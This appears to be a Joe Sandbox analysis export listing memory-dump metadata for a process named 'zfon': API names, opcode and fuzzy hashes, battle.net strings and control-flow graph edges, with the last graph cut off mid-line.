                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_allocmalloc$ConsoleCtrlHandleHandlerModuleSleepfree
                                                                                                • String ID:
                                                                                                • API String ID: 1258940858-0
                                                                                                • Opcode ID: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                • Instruction ID: eae1ab0b7a5b59ec524273681eca224b0f9a9e126a629c048a6728c1fe34e338
                                                                                                • Opcode Fuzzy Hash: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                • Instruction Fuzzy Hash: 84215E20E0C64291EB55BF26AC411B9D7B29F84784FC80035E97D073DBEE2DE44486F1

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExceptionFileLastThrowView
                                                                                                • String ID:
                                                                                                • API String ID: 2958022518-0
                                                                                                • Opcode ID: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                • Instruction ID: bce915de1cffd8436c3459c2998b5a2ab2615b63cf6a347664d9da29690841a2
                                                                                                • Opcode Fuzzy Hash: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                • Instruction Fuzzy Hash: 3501D861A14745C3EF18AF24E844339A3A0FF84754F500835DB5D4ABD9DF3DC45287A0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2803490479-0
                                                                                                • Opcode ID: 2ded609dae4ce5e57364cc0bfb32a0ef494e20ef4200fdc9d1d4aa37da518e16
                                                                                                • Instruction ID: 2587392541922adf30ef915fbb19522a8dc15e9e67f7ac82fb1ee587ba423cd2
                                                                                                • Opcode Fuzzy Hash: 2ded609dae4ce5e57364cc0bfb32a0ef494e20ef4200fdc9d1d4aa37da518e16
                                                                                                • Instruction Fuzzy Hash: E6F0892161C79181E7209A197800039D6B4AB89BE0F644734EBFD477DDDF3CD4514760

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _onexit
                                                                                                • String ID:
                                                                                                • API String ID: 572287377-0
                                                                                                • Opcode ID: 83ae8cda057869e4bcfce759bd0886fbae876962244f8b9fa94d9d0ed1065b8c
                                                                                                • Instruction ID: 101527fc942efb76abcd1dc8eb97191bcd353566ee098423acd92d3c9d873e20
                                                                                                • Opcode Fuzzy Hash: 83ae8cda057869e4bcfce759bd0886fbae876962244f8b9fa94d9d0ed1065b8c
                                                                                                • Instruction Fuzzy Hash: 34E0C252F69487D0E600BF3DEC91BF82150AF243C1FE05531C60D816A1DD0CD39AEB00

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 151 7ff8b90f8510-7ff8b90f851b 152 7ff8b90f8525-7ff8b90f8529 151->152 153 7ff8b90f851d-7ff8b90f851f setlocale 151->153 153->152
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale
                                                                                                • String ID:
                                                                                                • API String ID: 1598674530-0
                                                                                                • Opcode ID: 8448ee705ff148786f64ba50eaaef5e3f2e566f6558155d0efa0fa51944e528a
                                                                                                • Instruction ID: c2ee8524f5f5307c4e43159f298094b5c10931ac236cadd9385483acdc73511f
                                                                                                • Opcode Fuzzy Hash: 8448ee705ff148786f64ba50eaaef5e3f2e566f6558155d0efa0fa51944e528a
                                                                                                • Instruction Fuzzy Hash: BCC02B61F0D140C1ED4C2F1D58811390231AF08FC4F905834C70F00100CD1EC0934300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_allocfree$malloc
                                                                                                • String ID: /shop/$battle.net$https$www.battlenet.com.cn
                                                                                                • API String ID: 3106151382-2878237680
                                                                                                • Opcode ID: 30ebd4300529cf13d2a0f6aac6105ca9c1e8fd502c8f71a02a4b405466ebcc6f
                                                                                                • Instruction ID: 3022834a09a3ffd16a279211b8201602eba1896dbcee6b391533a0decf307954
                                                                                                • Opcode Fuzzy Hash: 30ebd4300529cf13d2a0f6aac6105ca9c1e8fd502c8f71a02a4b405466ebcc6f
                                                                                                • Instruction Fuzzy Hash: E0D18C32B08B418AEB11EF65D8103ADB3B6AB04B98F844535CE2D17BD9DF39D416C3A5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$memcpymemmove$malloc
                                                                                                • String ID: ([:\/]|\?|\n|$)
                                                                                                • API String ID: 2735842428-1527476142
                                                                                                • Opcode ID: 94d23265fd06d7eb7b31fa9a22f1bce6258c008eafdf22e478348a61a271287d
                                                                                                • Instruction ID: 3f537f2262b2f256d631bdfa910c813040c08dd02bd874bb1c48bad1a85c36d7
                                                                                                • Opcode Fuzzy Hash: 94d23265fd06d7eb7b31fa9a22f1bce6258c008eafdf22e478348a61a271287d
                                                                                                • Instruction Fuzzy Hash: 98028F62F09B4185FB50EEA5DC103ADA771AB187E8F845232DE2E57ADDDF38D40583A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                • String ID:
                                                                                                • API String ID: 1462992686-0
                                                                                                • Opcode ID: a7f38d0303b15842b5440bcbd9168077520873a5db10c70a3f6b3d47c523b3e9
                                                                                                • Instruction ID: 074d4ed2881e6f135aea2210d596e24f28d4fe7b593f0df0c2e734f97ff08f82
                                                                                                • Opcode Fuzzy Hash: a7f38d0303b15842b5440bcbd9168077520873a5db10c70a3f6b3d47c523b3e9
                                                                                                • Instruction Fuzzy Hash: 7E817122609B8186E795EF11AC143AAB7B4EF89BC0F849434DA9D077E8DF3CD455C7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: freemallocmemcpy$memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2260118914-0
                                                                                                • Opcode ID: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                • Instruction ID: 048f2554103fc5fde6d1a738e63b336151641540e67e67f853ea6ad1197465d0
                                                                                                • Opcode Fuzzy Hash: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                • Instruction Fuzzy Hash: 62E17222B0964185FB10FFB2D8403FDA3B2AB48798F840636DE2E176CDDE39D40583A5
                                                                                                APIs
                                                                                                Strings
                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7F97A4F63
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                • API String ID: 389471666-631824599
                                                                                                • Opcode ID: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                • Instruction ID: 6d03f147cbeb9adb8b27fb92f3160d6f14cfe3e9865261e5a2f21ef2071ab87f
                                                                                                • Opcode Fuzzy Hash: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                • Instruction Fuzzy Hash: 17115E32A2474196E744AF22E944379B2F5FF48395F845135C66D825A8EF3DE0B4C7B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale___lc_locale_name_func__crt
                                                                                                • String ID:
                                                                                                • API String ID: 2625200093-0
                                                                                                • Opcode ID: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                • Instruction ID: cb281c7f50b6d5fc5eef32d0eb03a6c3268ff3c2dbf57f407823c68dc86a1477
                                                                                                • Opcode Fuzzy Hash: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                • Instruction Fuzzy Hash: A5F0A77AA2838247D7549F58D0C1AA82360FB48790FC04435EF4E422A9CB5CD8CAC600
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$FileSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2086374402-0
                                                                                                • Opcode ID: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                • Instruction ID: fed9de096972e1d49ad89bff175a8d3a43fe34c77d987ec5abdf4645fcdd853f
                                                                                                • Opcode Fuzzy Hash: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                • Instruction Fuzzy Hash: 81E0BF72A296448BDB85CF55F49051AB7B0FB8CB95B446021FA9B87B18DA3CD4548F00

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1018 7ff8bfb594cc-7ff8bfb594fd 1019 7ff8bfb59a93-7ff8bfb59aa5 1018->1019 1020 7ff8bfb59503-7ff8bfb59521 1018->1020 1021 7ff8bfb59aa8-7ff8bfb59aab call 7ff8bfb579dc 1019->1021 1022 7ff8bfb5963c-7ff8bfb5963f 1020->1022 1023 7ff8bfb59527 1020->1023 1030 7ff8bfb59ab0-7ff8bfb59acc 1021->1030 1025 7ff8bfb59676-7ff8bfb5967d 1022->1025 1026 7ff8bfb59641-7ff8bfb59665 call 7ff8bfb5aadc 1022->1026 1027 7ff8bfb5952d-7ff8bfb59530 1023->1027 1028 7ff8bfb5962a-7ff8bfb59637 1023->1028 1034 7ff8bfb5967f-7ff8bfb59682 1025->1034 1035 7ff8bfb59689-7ff8bfb59690 1025->1035 1046 7ff8bfb5966b-7ff8bfb59671 1026->1046 1047 7ff8bfb599d5-7ff8bfb599d9 1026->1047 1032 7ff8bfb595a8-7ff8bfb595ad 1027->1032 1033 7ff8bfb59532 1027->1033 1029 7ff8bfb599cc-7ff8bfb599d0 call 7ff8bfb57494 1028->1029 1029->1047 1036 7ff8bfb595af-7ff8bfb595b2 1032->1036 1037 7ff8bfb59618-7ff8bfb59625 1032->1037 1039 7ff8bfb59534-7ff8bfb59537 1033->1039 1040 7ff8bfb59560-7ff8bfb5956d 1033->1040 1034->1035 1041 7ff8bfb59696 1035->1041 1042 7ff8bfb597a0-7ff8bfb597a3 1035->1042 1044 7ff8bfb595eb-7ff8bfb59613 call 7ff8bfb57a60 1036->1044 1045 7ff8bfb595b4-7ff8bfb595b7 1036->1045 1037->1029 1050 7ff8bfb59539-7ff8bfb5953c 1039->1050 1051 7ff8bfb59596-7ff8bfb595a3 1039->1051 1040->1029 1052 7ff8bfb5969c-7ff8bfb5969f 1041->1052 1053 7ff8bfb5978e-7ff8bfb5979b 1041->1053 1048 7ff8bfb597a9 1042->1048 1049 7ff8bfb59920-7ff8bfb59923 1042->1049 1044->1047 1054 7ff8bfb595b9-7ff8bfb595bc 1045->1054 1055 7ff8bfb595d5-7ff8bfb595e6 call 7ff8bfb57494 1045->1055 1046->1030 1064 7ff8bfb599db-7ff8bfb599e2 1047->1064 1065 7ff8bfb59a0a-7ff8bfb59a11 1047->1065 1056 7ff8bfb597af-7ff8bfb597b2 1048->1056 1057 7ff8bfb5990e-7ff8bfb5991b 1048->1057 1059 7ff8bfb599bf 1049->1059 1060 7ff8bfb59929-7ff8bfb5992c 1049->1060 1050->1051 1058 7ff8bfb5953e-7ff8bfb59541 1050->1058 1051->1029 1061 7ff8bfb596a5 1052->1061 1062 7ff8bfb59747-7ff8bfb5974a 1052->1062 1053->1029 1070 7ff8bfb595cd-7ff8bfb595d0 1054->1070 1071 7ff8bfb595be-7ff8bfb595c1 1054->1071 1055->1044 1072 7ff8bfb5980b 1056->1072 1073 7ff8bfb597b4-7ff8bfb597b7 1056->1073 1057->1029 1058->1051 1074 7ff8bfb59543-7ff8bfb59546 1058->1074 1075 7ff8bfb599c6 1059->1075 1076 7ff8bfb5992e-7ff8bfb59931 1060->1076 1077 7ff8bfb59967-7ff8bfb599bd call 7ff8bfb5c550 call 7ff8bfb57680 call 7ff8bfb579dc 1060->1077 1079 7ff8bfb5977f-7ff8bfb59789 1061->1079 1080 7ff8bfb596ab-7ff8bfb596ae 1061->1080 1062->1079 1081 7ff8bfb5974c-7ff8bfb5974f 1062->1081 1067 7ff8bfb599fa-7ff8bfb59a08 1064->1067 1068 7ff8bfb599e4-7ff8bfb599e8 1064->1068 1069 7ff8bfb59a18-7ff8bfb59a4d call 7ff8bfb57680 call 7ff8bfb579dc 1065->1069 1067->1069 1087 7ff8bfb599ea-7ff8bfb599f2 1068->1087 1088 7ff8bfb59a50-7ff8bfb59a53 1068->1088 1069->1088 1082 7ff8bfb59810-7ff8bfb59827 1070->1082 1071->1070 1084 7ff8bfb595c3-7ff8bfb595c6 1071->1084 1072->1082 1090 7ff8bfb597f9-7ff8bfb59806 1073->1090 1091 7ff8bfb597b9-7ff8bfb597bc 1073->1091 1092 7ff8bfb59548-7ff8bfb5954b 1074->1092 1093 7ff8bfb59584-7ff8bfb59591 1074->1093 1075->1029 1094 7ff8bfb5995b-7ff8bfb59965 1076->1094 1095 7ff8bfb59933-7ff8bfb59936 1076->1095 1077->1047 1079->1029 1096 7ff8bfb59734-7ff8bfb59742 call 7ff8bfb57940 1080->1096 1097 7ff8bfb596b4-7ff8bfb596b7 1080->1097 1085 7ff8bfb59751-7ff8bfb59754 1081->1085 1086 7ff8bfb59770-7ff8bfb5977a 1081->1086 1100 7ff8bfb59829-7ff8bfb5984c call 7ff8bfb5c9d4 1082->1100 1101 7ff8bfb59888-7ff8bfb5988b 1082->1101 1084->1070 1103 7ff8bfb595c8-7ff8bfb595cb 1084->1103 1085->1086 1105 7ff8bfb59756-7ff8bfb59759 1085->1105 1086->1029 1087->1088 1106 7ff8bfb599f4-7ff8bfb599f8 1087->1106 1108 7ff8bfb59a55-7ff8bfb59a7f call 7ff8bfb58c5c call 7ff8bfb579dc call 7ff8bfb57ae0 1088->1108 1109 7ff8bfb59a84-7ff8bfb59a91 1088->1109 1090->1029 1110 7ff8bfb597be-7ff8bfb597c1 1091->1110 1111 7ff8bfb597ea-7ff8bfb597f4 1091->1111 1092->1093 1112 7ff8bfb5954d-7ff8bfb59550 1092->1112 1093->1029 1094->1029 1113 7ff8bfb5994c-7ff8bfb5994f 1095->1113 1114 7ff8bfb59938-7ff8bfb5993b 1095->1114 1096->1047 1098 7ff8bfb596b9-7ff8bfb596bc 1097->1098 1099 7ff8bfb596f2-7ff8bfb5972f call 7ff8bfb594cc call 7ff8bfb57680 1097->1099 1115 7ff8bfb596be-7ff8bfb596c1 1098->1115 1116 7ff8bfb596e0-7ff8bfb596ed 1098->1116 1099->1021 1145 7ff8bfb5984e-7ff8bfb59876 call 7ff8bfb57a60 1100->1145 1146 